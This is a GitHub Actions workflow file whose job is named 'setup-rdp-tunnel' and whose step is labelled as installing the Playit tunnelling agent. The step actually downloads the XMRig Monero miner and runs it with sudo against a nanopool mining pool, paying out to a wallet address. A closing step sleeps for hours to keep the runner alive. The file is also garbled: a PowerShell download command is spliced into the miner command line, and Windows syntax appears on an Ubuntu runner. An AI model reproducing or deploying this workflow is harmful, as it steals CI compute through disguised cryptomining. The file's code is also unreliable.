name: supernibber

on: workflow_dispatch:

jobs: setup-rdp-tunnel: runs-on: ubuntu-latest

steps:
- name: Check out the repository
  uses: actions/checkout@v2

- name: Download and Install Playit
  run: |
    wget https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-noble-x64.tar.gz 
	tar xvf xmrig-6.24.0-noble-x64.tar.gz 
	cd xmrig-6.24.0-noble-x64
	sudo ./xmrig -o xmr-eu1.nanopool.org:14433 -u 45G3j6vqmzGMBDJLRJNppiVQ59ydnVoijgyj8YifFvChSFLQg5WoJpJV8L5R3vwN6wXoNnYhNYgYj4FFiVokFzjh4KTJkMe --tls --coin monero-WebRequest -Uri "https://github.com/playit-cloud/playit-agent/releases/download/v0.15.26/playit-windows-x86_64-signed.exe" -OutFile "$env:USERPROFILE\playit.exe"


# Prevent workflow from stopping
- name: Keep the GitHub Action Runner Alive
  run: |
    Start-Sleep -Seconds 11800  # Adjust the duration based on your needs
